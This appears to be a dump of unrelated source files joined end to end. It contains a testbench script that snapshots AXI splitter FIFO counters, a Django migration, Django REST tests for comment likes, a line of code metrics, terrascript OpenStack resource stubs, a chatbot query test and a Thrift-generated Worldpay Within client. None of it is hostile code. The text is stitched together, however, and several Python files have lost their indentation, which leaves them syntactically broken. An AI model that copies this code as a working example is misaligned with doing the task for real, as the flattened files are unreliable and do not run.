logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split2.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split2.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split2.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split2.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split2.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split2.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split2.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split2.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split2.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split2.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split3.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split3.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split3.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split3.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split3.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split3.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split3.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split3.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split3.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split3.axi_wr_4_splitter.w_fifo.count"))
# Snapshot the splitter FIFO counters for split4 through split9; every
# splitter instance exposes the same signal set, so iterate instead of
# repeating one log_info/peek pair per signal. Output is identical to the
# unrolled form: "SNP <hex value> <full signal path>" per line, same order.
for split in ("split4", "split5", "split6", "split7", "split8", "split9"):
    rd = "tb.dut.%s.axi_rd_4_splitter" % split
    wr = "tb.dut.%s.axi_wr_4_splitter" % split
    paths = ["%s.%s" % (rd, sig) for sig in (
        "ar_fifo.next_count", "ar_fifo.count",
        "r_fifo.next_count", "r_fifo.count")]
    paths += ["%s.%s" % (wr, sig) for sig in (
        "a_bcount", "b_bcount", "c_bcount", "d_bcount",
        "aw_fifo.next_count", "aw_fifo.count",
        "b_fifo.next_count", "b_fifo.count",
        "back_bid_a_fifo.count", "back_bid_a_fifo.int_count",
        "back_bid_b_fifo.count", "back_bid_b_fifo.int_count",
        "back_bid_c_fifo.count", "back_bid_c_fifo.int_count",
        "back_bid_d_fifo.count", "back_bid_d_fifo.int_count",
        "order_fifo.next_count", "order_fifo.count",
        "w_fifo.next_count", "w_fifo.count")]
    for path in paths:
        logs.log_info("SNP %x %s" % (logs.peek(path), path))
# File: server/player/mahjong_soul/migrations/0004_auto_20191231_0931.py (MIT)
# Generated by Django 2.2.6 on 2019-12-31 09:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mahjong_soul', '0003_mspointshistory'),
]
operations = [
migrations.AlterField(
model_name='msaccountstatistic',
name='hanchan_first_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='hanchan_fourth_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='hanchan_second_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='hanchan_third_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='tonpusen_first_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='tonpusen_fourth_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='tonpusen_second_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='tonpusen_third_place',
field=models.PositiveIntegerField(default=0),
),
]
# File: authors/apps/comments/tests/test_likes.py (BSD-3-Clause)
import json
from rest_framework.test import APIClient, APITestCase
from authors.apps.authentication.models import User
from authors.apps.comments.tests.base import BaseTestCase
from django.urls import reverse
from rest_framework import status
class TestLikeCommment(BaseTestCase):
"""Class to test like and unlike a comment."""
def test_user_to_like_own_comment(self):
        """Test that liking your own comment is forbidden (403)."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header, format="json")
self.assertEqual(response1.status_code, 403)
def test_user_liking_your_own_comment(self):
"""Test liking your own comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header, format="json")
self.assertEqual(response1.data['message'], "You can not like your own comment.")
    def test_user_liking_another_comment(self):
        """Test liking another user's comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.status_code, 200)
def test_user_to_like_another_comment(self):
"""Test liking another comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.data['success'], "You have successfully liked this comment.")
self.assertEqual(response1.status_code, 200)
def test_user_to_like_twice_a_comment(self):
        """Test that liking a comment twice cancels the like."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.data['message'], "Your like has been cancelled")
self.assertEqual(response1.status_code, 200)
def test_user_has_not_liked_a_comment(self):
"""Test a user has ever liked a comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('get_likes', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.get(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertIn('False', str(response1.data))
def test_user_has_not_liked_comment(self):
"""Test a user has never liked a comment using status code."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('get_likes', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.get(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.status_code, 200)
def test_user_has_liked_comment(self):
"""Test a user has ever liked a comment using status code."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url0 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
url1 = reverse('get_likes', kwargs={'article_id':1, 'comment_id':comment_id})
        response2 = self.client.post(url0,
                                     HTTP_AUTHORIZATION=self.auth_header2, format="json")
response1 = self.client.get(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.status_code, 200)
self.assertIn('True', str(response1.data))
def test_user_has_likes_comment(self):
"""Test a user has ever liked a comment using message."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url0 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
url1 = reverse('get_likes', kwargs={'article_id':1, 'comment_id':comment_id})
        response2 = self.client.post(url0,
                                     HTTP_AUTHORIZATION=self.auth_header2, format="json")
response1 = self.client.get(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertIn('True', str(response1.data))
| 57.014493 | 96 | 0.607397 | 883 | 7,868 | 5.193658 | 0.096263 | 0.0785 | 0.096162 | 0.114479 | 0.897732 | 0.880506 | 0.870257 | 0.843873 | 0.843873 | 0.843873 | 0 | 0.021483 | 0.278216 | 7,868 | 137 | 97 | 57.430657 | 0.786054 | 0.052872 | 0 | 0.820513 | 0 | 0 | 0.113498 | 0 | 0 | 0 | 0 | 0 | 0.179487 | 1 | 0.076923 | false | 0 | 0.051282 | 0 | 0.136752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
79424770b1f8337bb2cf586e89d8c1a8121df1ba | 5,860 | py | Python | terrascript/openstack/r.py | vutsalsinghal/python-terrascript | 3b9fb5ad77453d330fb0cd03524154a342c5d5dc | [
"BSD-2-Clause"
] | null | null | null | terrascript/openstack/r.py | vutsalsinghal/python-terrascript | 3b9fb5ad77453d330fb0cd03524154a342c5d5dc | [
"BSD-2-Clause"
] | null | null | null | terrascript/openstack/r.py | vutsalsinghal/python-terrascript | 3b9fb5ad77453d330fb0cd03524154a342c5d5dc | [
"BSD-2-Clause"
] | null | null | null | # terrascript/openstack/r.py
import terrascript
class openstack_blockstorage_quotaset_v2(terrascript.Resource):
pass
class openstack_blockstorage_quotaset_v3(terrascript.Resource):
pass
class openstack_blockstorage_volume_v1(terrascript.Resource):
pass
class openstack_blockstorage_volume_v2(terrascript.Resource):
pass
class openstack_blockstorage_volume_v3(terrascript.Resource):
pass
class openstack_blockstorage_volume_attach_v2(terrascript.Resource):
pass
class openstack_blockstorage_volume_attach_v3(terrascript.Resource):
pass
class openstack_compute_flavor_v2(terrascript.Resource):
pass
class openstack_compute_flavor_access_v2(terrascript.Resource):
pass
class openstack_compute_instance_v2(terrascript.Resource):
pass
class openstack_compute_interface_attach_v2(terrascript.Resource):
pass
class openstack_compute_keypair_v2(terrascript.Resource):
pass
class openstack_compute_secgroup_v2(terrascript.Resource):
pass
class openstack_compute_servergroup_v2(terrascript.Resource):
pass
class openstack_compute_floatingip_v2(terrascript.Resource):
pass
class openstack_compute_floatingip_associate_v2(terrascript.Resource):
pass
class openstack_compute_volume_attach_v2(terrascript.Resource):
pass
class openstack_containerinfra_clustertemplate_v1(terrascript.Resource):
pass
class openstack_containerinfra_cluster_v1(terrascript.Resource):
pass
class openstack_db_instance_v1(terrascript.Resource):
pass
class openstack_db_user_v1(terrascript.Resource):
pass
class openstack_db_configuration_v1(terrascript.Resource):
pass
class openstack_db_database_v1(terrascript.Resource):
pass
class openstack_dns_recordset_v2(terrascript.Resource):
pass
class openstack_dns_zone_v2(terrascript.Resource):
pass
class openstack_fw_firewall_v1(terrascript.Resource):
pass
class openstack_fw_policy_v1(terrascript.Resource):
pass
class openstack_fw_rule_v1(terrascript.Resource):
pass
class openstack_identity_endpoint_v3(terrascript.Resource):
pass
class openstack_identity_project_v3(terrascript.Resource):
pass
class openstack_identity_role_v3(terrascript.Resource):
pass
class openstack_identity_role_assignment_v3(terrascript.Resource):
pass
class openstack_identity_service_v3(terrascript.Resource):
pass
class openstack_identity_user_v3(terrascript.Resource):
pass
class openstack_identity_application_credential_v3(terrascript.Resource):
pass
class openstack_images_image_v2(terrascript.Resource):
pass
class openstack_lb_member_v1(terrascript.Resource):
pass
class openstack_lb_monitor_v1(terrascript.Resource):
pass
class openstack_lb_pool_v1(terrascript.Resource):
pass
class openstack_lb_vip_v1(terrascript.Resource):
pass
class openstack_lb_loadbalancer_v2(terrascript.Resource):
pass
class openstack_lb_listener_v2(terrascript.Resource):
pass
class openstack_lb_pool_v2(terrascript.Resource):
pass
class openstack_lb_member_v2(terrascript.Resource):
pass
class openstack_lb_monitor_v2(terrascript.Resource):
pass
class openstack_lb_l7policy_v2(terrascript.Resource):
pass
class openstack_lb_l7rule_v2(terrascript.Resource):
pass
class openstack_networking_floatingip_v2(terrascript.Resource):
pass
class openstack_networking_floatingip_associate_v2(terrascript.Resource):
pass
class openstack_networking_network_v2(terrascript.Resource):
pass
class openstack_networking_port_v2(terrascript.Resource):
pass
class openstack_networking_rbac_policy_v2(terrascript.Resource):
pass
class openstack_networking_port_secgroup_associate_v2(terrascript.Resource):
pass
class openstack_networking_qos_bandwidth_limit_rule_v2(terrascript.Resource):
pass
class openstack_networking_qos_dscp_marking_rule_v2(terrascript.Resource):
pass
class openstack_networking_qos_minimum_bandwidth_rule_v2(terrascript.Resource):
pass
class openstack_networking_qos_policy_v2(terrascript.Resource):
pass
class openstack_networking_router_v2(terrascript.Resource):
pass
class openstack_networking_router_interface_v2(terrascript.Resource):
pass
class openstack_networking_router_route_v2(terrascript.Resource):
pass
class openstack_networking_secgroup_v2(terrascript.Resource):
pass
class openstack_networking_secgroup_rule_v2(terrascript.Resource):
pass
class openstack_networking_subnet_v2(terrascript.Resource):
pass
class openstack_networking_subnet_route_v2(terrascript.Resource):
pass
class openstack_networking_subnetpool_v2(terrascript.Resource):
pass
class openstack_networking_addressscope_v2(terrascript.Resource):
pass
class openstack_networking_trunk_v2(terrascript.Resource):
pass
class openstack_objectstorage_container_v1(terrascript.Resource):
pass
class openstack_objectstorage_object_v1(terrascript.Resource):
pass
class openstack_objectstorage_tempurl_v1(terrascript.Resource):
pass
class openstack_vpnaas_ipsec_policy_v2(terrascript.Resource):
pass
class openstack_vpnaas_service_v2(terrascript.Resource):
pass
class openstack_vpnaas_ike_policy_v2(terrascript.Resource):
pass
class openstack_vpnaas_endpoint_group_v2(terrascript.Resource):
pass
class openstack_vpnaas_site_connection_v2(terrascript.Resource):
pass
class openstack_sharedfilesystem_securityservice_v2(terrascript.Resource):
pass
class openstack_sharedfilesystem_sharenetwork_v2(terrascript.Resource):
pass
class openstack_sharedfilesystem_share_v2(terrascript.Resource):
pass
class openstack_sharedfilesystem_share_access_v2(terrascript.Resource):
pass
class openstack_keymanager_secret_v1(terrascript.Resource):
pass
class openstack_keymanager_container_v1(terrascript.Resource):
pass
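The stub classes above all subclass terrascript.Resource with empty bodies. As an aside, a family of near-identical subclasses like this can also be generated dynamically with the built-in type(). The sketch below uses a stand-in Resource base (not the real terrascript one) so it runs on its own; the resource names are just three examples taken from the list above:

```python
# Minimal stand-in for terrascript.Resource, for illustration only.
class Resource:
    pass

# Names mirroring a few of the generated stubs above.
RESOURCE_NAMES = [
    "openstack_compute_instance_v2",
    "openstack_networking_network_v2",
    "openstack_dns_zone_v2",
]

# type(name, bases, namespace) builds one empty subclass per name,
# equivalent to writing `class <name>(Resource): pass` by hand.
generated = {name: type(name, (Resource,), {}) for name in RESOURCE_NAMES}

inst = generated["openstack_compute_instance_v2"]()
print(type(inst).__name__)         # -> openstack_compute_instance_v2
print(isinstance(inst, Resource))  # -> True
```

The generated classes behave identically to the hand-written stubs; code generators often emit the explicit form anyway because it is grep-friendly and visible to static tooling.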
# modules/tests/test_request.py (from anamayagarodia/JARVIS-on-Messenger, MIT license)
import modules
def test_request():
    # Both 'request' and 'report' should resolve to the 'request' module;
    # an unrelated query should resolve to something else.
    assert('request' == modules.process_query('request')[0])
    assert('request' == modules.process_query('report')[0])
    assert('request' != modules.process_query('something random')[0])
# wrappers/python_2-7/wpwithin/WPWithin.py (from UpperLEFTY/worldpay-within-sdk, MIT license)
#
# Autogenerated by Thrift Compiler (0.10.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
class Iface(object):
"""
WorldpayWithin Service - exposing all WorldpayWithin SDK functionality
"""
def setup(self, name, description):
"""
Parameters:
- name
- description
"""
pass
def addService(self, svc):
"""
Parameters:
- svc
"""
pass
def removeService(self, svc):
"""
Parameters:
- svc
"""
pass
def initConsumer(self, scheme, hostname, port, urlPrefix, clientID, hceCard, pspConfig):
"""
Parameters:
- scheme
- hostname
- port
- urlPrefix
- clientID
- hceCard
- pspConfig
"""
pass
def initProducer(self, pspConfig):
"""
Parameters:
- pspConfig
"""
pass
def getDevice(self):
pass
def startServiceBroadcast(self, timeoutMillis):
"""
Parameters:
- timeoutMillis
"""
pass
def stopServiceBroadcast(self):
pass
def deviceDiscovery(self, timeoutMillis):
"""
Parameters:
- timeoutMillis
"""
pass
def requestServices(self):
pass
def getServicePrices(self, serviceId):
"""
Parameters:
- serviceId
"""
pass
def selectService(self, serviceId, numberOfUnits, priceId):
"""
Parameters:
- serviceId
- numberOfUnits
- priceId
"""
pass
def makePayment(self, request):
"""
Parameters:
- request
"""
pass
def beginServiceDelivery(self, serviceID, serviceDeliveryToken, unitsToSupply):
"""
Parameters:
- serviceID
- serviceDeliveryToken
- unitsToSupply
"""
pass
def endServiceDelivery(self, serviceID, serviceDeliveryToken, unitsReceived):
"""
Parameters:
- serviceID
- serviceDeliveryToken
- unitsReceived
"""
pass
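Iface above defines the service contract; a concrete handler class supplies the behaviour behind each method. A minimal, self-contained sketch of that pattern follows, with a stand-in Iface of just two methods and a plain dict in place of the real Device struct (the real Iface is the one defined in this module):

```python
# Stand-in interface with the same method names as two of the real
# Iface methods, so this snippet runs on its own.
class Iface:
    def setup(self, name, description):
        pass

    def getDevice(self):
        pass


class Handler(Iface):
    """Toy service handler: stores setup values, reports them as a device."""

    def __init__(self):
        self._name = None
        self._description = None

    def setup(self, name, description):
        self._name = name
        self._description = description

    def getDevice(self):
        # A real handler would return a Device struct; a dict stands in here.
        return {"name": self._name, "description": self._description}


h = Handler()
h.setup("till-01", "vending machine")
print(h.getDevice()["name"])  # -> till-01
```

An instance of such a handler is what gets passed to Processor(handler) below; the processor never touches business logic itself, it only deserialises arguments and forwards them.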
class Client(Iface):
"""
WorldpayWithin Service - exposing all WorldpayWithin SDK functionality
"""
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def setup(self, name, description):
"""
Parameters:
- name
- description
"""
self.send_setup(name, description)
self.recv_setup()
def send_setup(self, name, description):
self._oprot.writeMessageBegin('setup', TMessageType.CALL, self._seqid)
args = setup_args()
args.name = name
args.description = description
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_setup(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = setup_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def addService(self, svc):
"""
Parameters:
- svc
"""
self.send_addService(svc)
self.recv_addService()
def send_addService(self, svc):
self._oprot.writeMessageBegin('addService', TMessageType.CALL, self._seqid)
args = addService_args()
args.svc = svc
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_addService(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = addService_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def removeService(self, svc):
"""
Parameters:
- svc
"""
self.send_removeService(svc)
self.recv_removeService()
def send_removeService(self, svc):
self._oprot.writeMessageBegin('removeService', TMessageType.CALL, self._seqid)
args = removeService_args()
args.svc = svc
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_removeService(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = removeService_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
